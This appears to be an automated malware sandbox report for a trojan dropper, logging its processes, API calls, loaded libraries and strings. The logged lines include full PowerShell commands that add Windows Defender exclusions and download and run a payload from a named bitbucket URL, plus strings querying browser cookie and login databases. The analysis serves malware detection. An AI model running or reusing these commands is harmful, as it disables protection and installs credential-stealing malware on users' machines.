              Source: Gq48hjKhZf.exe, 00000000.00000002.3916726435.00000000020C6000.00000004.00000020.00020000.00000000.sdmp, AC31.bat.0.drString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.5.8.193:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_0045A10F
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_0045A10F
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,10_2_0046DC80
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,10_2_0044C37A
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_0047C81C

              System Summary

              barindex
              Powershell drops PE file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\AHPOBS.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,10_2_00431BE8
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00446313
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,10_2_004333BE
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_00000001400138E50_2_00000001400138E5
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_00000001400154F00_2_00000001400154F0
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_00000001400151600_2_0000000140015160
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_00000001400151700_2_0000000140015170
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_00000001400131750_2_0000000140013175
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_00000001400102100_2_0000000140010210
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_00000001400162100_2_0000000140016210
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_000000014000EA480_2_000000014000EA48
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_000000014001366E0_2_000000014001366E
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_000000014000B7580_2_000000014000B758
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_0000000140012FDD0_2_0000000140012FDD
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004096A010_2_004096A0
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0042200C10_2_0042200C
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0041A21710_2_0041A217
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0041221610_2_00412216
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0042435D10_2_0042435D
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004033C010_2_004033C0
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0044F43010_2_0044F430
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004125E810_2_004125E8
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0044663B10_2_0044663B
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0041380110_2_00413801
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0042096F10_2_0042096F
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004129D010_2_004129D0
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004119E310_2_004119E3
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0041C9AE10_2_0041C9AE
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0047EA6F10_2_0047EA6F
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0040FA1010_2_0040FA10
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0044EB5F10_2_0044EB5F
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00423C8110_2_00423C81
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00411E7810_2_00411E78
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00442E0C10_2_00442E0C
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00420EC010_2_00420EC0
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0044CF1710_2_0044CF17
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00444FD210_2_00444FD2
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AHPOBS.exe 7230B549346DBAB880D1D713D8C9DFC1005065C0F0CEBB16AD4F1A15F05D088A
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Windata\svhost.exe 7230B549346DBAB880D1D713D8C9DFC1005065C0F0CEBB16AD4F1A15F05D088A
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: String function: 004115D7 appears 36 times
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: String function: 00416C70 appears 39 times
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: String function: 00445AE0 appears 55 times
              Source: classification engineClassification label: mal100.troj.evad.winEXE@14/14@2/3
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0044AF6C GetLastError,FormatMessageW,10_2_0044AF6C
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,10_2_004333BE
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,10_2_00464EAE
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,10_2_0045D619
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00433EE0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,10_2_00433EE0
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,10_2_0047839D
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,10_2_0043305F
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeFile created: C:\Users\user\AppData\Roaming\WindataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile created: C:\Users\user\AppData\Local\Temp\AC2F.tmpJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: AHPOBS.exe, 0000000A.00000002.3917212918.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT * FROM cookies;r<"m
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT * FROM moz_cookies;x?`m
              Source: AHPOBS.exe, 0000000A.00000002.3917212918.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT * FROM logins;
              Source: Gq48hjKhZf.exeVirustotal: Detection: 56%
              Source: Gq48hjKhZf.exeReversingLabs: Detection: 39%
              Source: unknownProcess created: C:\Users\user\Desktop\Gq48hjKhZf.exe "C:\Users\user\Desktop\Gq48hjKhZf.exe"
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\AHPOBS.exe C:\Users\user\AppData\Local\Temp\AHPOBS.exe ;
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\AHPOBS.exe C:\Users\user\AppData\Local\Temp\AHPOBS.exe ;Jump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
